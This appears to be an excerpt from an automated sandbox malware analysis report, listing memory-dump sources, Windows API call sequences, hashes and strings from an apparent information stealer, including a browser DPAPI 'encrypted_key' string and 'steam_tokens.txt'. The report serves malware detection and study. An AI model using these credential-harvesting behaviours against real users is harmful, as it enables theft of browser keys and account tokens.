                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 9914f019657205a706e21e6f471d26f2151e10a89d0f891e96be38aa0a776bda
                            • Instruction ID: f93639d2746967cf365fb2163b6c4bdbb0c5e13771de4a8f9849523dd8851c27
                            • Opcode Fuzzy Hash: 9914f019657205a706e21e6f471d26f2151e10a89d0f891e96be38aa0a776bda
                            • Instruction Fuzzy Hash: 30416E71A0020A9BDB21EF68DC456AFBBF4EF54314F0445F4E915A72A3DA30ED09C790
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1EA61
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1EA7A
                            • lstrcat.KERNEL32(?,01878B58), ref: 00B1EA8D
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1EA9F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 281094e24525924b4049cc320bf9b5c1de1b3f8f0b3654eed4f92ee003dc4f53
                            • Instruction ID: c4e472a58123df570f8cd405ff37fde053a5d8ed126c04904f48187919643314
                            • Opcode Fuzzy Hash: 281094e24525924b4049cc320bf9b5c1de1b3f8f0b3654eed4f92ee003dc4f53
                            • Instruction Fuzzy Hash: 2E415671A10218ABCB55EB68DC45EED77F8FF58300F4044E4BA1AD7391DE709E888BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1ECDF
                            • lstrlen.KERNEL32(00000000), ref: 00B1ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ED1D
                            • lstrlen.KERNEL32(00000000), ref: 00B1ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00B1ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: e27e7168b9cd8a8ab57537f814a16a667e408c3b9b6f4583ed215989e5c38acd
                            • Instruction ID: 7209a510dd4aae311dd3d0d15513e79c9c224b981b337634cddf7edfdd961ba9
                            • Opcode Fuzzy Hash: e27e7168b9cd8a8ab57537f814a16a667e408c3b9b6f4583ed215989e5c38acd
                            • Instruction Fuzzy Hash: FA312A31A106555BC722BB78EC4A99E7FE8AF50300F4541B0B856DB292DF24DD4E8BD1
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0140E), ref: 00B09A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00B0140E), ref: 00B09AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,00B0140E), ref: 00B09AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,00B0140E,00000000,?,?,?,00B0140E), ref: 00B09AE0
                            • LocalFree.KERNEL32(?,?,?,?,00B0140E), ref: 00B09B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,00B0140E), ref: 00B09B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: d856416ebf743bd54a687b313a0e2d0b5cd56c31c3aad7bf1166167a1e15e8e8
                            • Instruction ID: 0b041e98302e1c50b84f855220a8b9364efa3089ffa0de88c0e8ee81abbec741
                            • Opcode Fuzzy Hash: d856416ebf743bd54a687b313a0e2d0b5cd56c31c3aad7bf1166167a1e15e8e8
                            • Instruction Fuzzy Hash: 81111C71600309AFE710DFA9DDD8AAA7BACEB44750F1041A9F911D72C1EB70DD50CBA0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25B14
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00B25B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00B25B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00B25B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 47120620e4ed10c88787404ab427f971625ed2ec4a057f415a36b728b5dee0b2
                            • Instruction ID: 04c0ec39d386268907d518c24afb720833fdc957e2914b0c021fa672e8a63d57
                            • Opcode Fuzzy Hash: 47120620e4ed10c88787404ab427f971625ed2ec4a057f415a36b728b5dee0b2
                            • Instruction Fuzzy Hash: C9417271B005199FCF18DF6CD995AAEBBF5EB88310F148269E919E7344E630ED01CB90
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D58
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1D5
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 73d6f133eb93a7d61c58b2b41dfcfa0fb7231aa85b3575648493d9c4e22b542a
                            • Instruction ID: 4c08737ca77b3e48b93751cda80d25f1a55e09fe87843582ddc502d48b6a34bf
                            • Opcode Fuzzy Hash: 73d6f133eb93a7d61c58b2b41dfcfa0fb7231aa85b3575648493d9c4e22b542a
                            • Instruction Fuzzy Hash: 1221D5723442048BD720DE2CE881A7AB7F9EF91720F604ABEE4558B291DB70DC808761
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B233EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B233F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00B23411
                            • wsprintfA.USER32 ref: 00B23437
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 536b5c1a5c4a9c306e23741c2d604c72d597173dcb49093e51d678b24fca88ac
                            • Instruction ID: b785f983718f258647b54d277b9423cc75267220cd430710ec0f8e1bda1ed599
                            • Opcode Fuzzy Hash: 536b5c1a5c4a9c306e23741c2d604c72d597173dcb49093e51d678b24fca88ac
                            • Instruction Fuzzy Hash: BB01D871A04714AFDB14DF98DD85B6EB7F9FB44B10F000269F916E7380D7B8590086A5
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0187DA30,00000000,00020119,?), ref: 00B1D7F5
                            • RegQueryValueExA.ADVAPI32(?,0187ED80,00000000,00000000,00000000,000000FF), ref: 00B1D819
                            • RegCloseKey.ADVAPI32(?), ref: 00B1D823
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1D848
                            • lstrcat.KERNEL32(?,0187EDF8), ref: 00B1D85C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 0707f593ada6bf78e3ef20f494214008a361d88ce84d19f5c2a9a1c71c0ce95f
                            • Instruction ID: abe2567d3226a5a734073a4b50476dacfd9450051faf96fa57e8504fdcbab30d
                            • Opcode Fuzzy Hash: 0707f593ada6bf78e3ef20f494214008a361d88ce84d19f5c2a9a1c71c0ce95f
                            • Instruction Fuzzy Hash: C6412475A1020CAFCB54EF68EC86BDE77B5AF54304F4040A4B509D7391EE30AA898FA1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B17F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B17F60
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B17FA5
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B17FD3
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B18007
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6aec86fb0bd6e1aaffa6ae7da0357b3188ce8027bae44f2fd716c436abb5eb08
                            • Instruction ID: 2077fc116494aee107623e5e42099949dde7ee665ec52bbff790e09646d03b72
                            • Opcode Fuzzy Hash: 6aec86fb0bd6e1aaffa6ae7da0357b3188ce8027bae44f2fd716c436abb5eb08
                            • Instruction Fuzzy Hash: F6416C7064821ADFCB20DF68D884EDAB7F4FF54300F514199E806DB351DB70AAA6CB91
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B180BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B180EA
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B18102
                            • lstrlen.KERNEL32(00000000), ref: 00B18140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1816F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: bf6f08bb0e0dd31b56c28a6ef46bfa8af7780e75ebbcaf9fa1d1234adc4cc5a0
                            • Instruction ID: a2dca2dd82a3765a3fed9bf91e172e36f45e70fb638983989135431c3836fb83
                            • Opcode Fuzzy Hash: bf6f08bb0e0dd31b56c28a6ef46bfa8af7780e75ebbcaf9fa1d1234adc4cc5a0
                            • Instruction Fuzzy Hash: CA416F72600206ABCB21DF6CD988BEABBF4FF48700F10859CA945E7254EF34D995CB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B23166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2316D
                            • RegOpenKeyExA.ADVAPI32(80000002,0186B8D8,00000000,00020119,?), ref: 00B2318C
                            • RegQueryValueExA.ADVAPI32(?,0187DBB0,00000000,00000000,00000000,000000FF), ref: 00B231A7
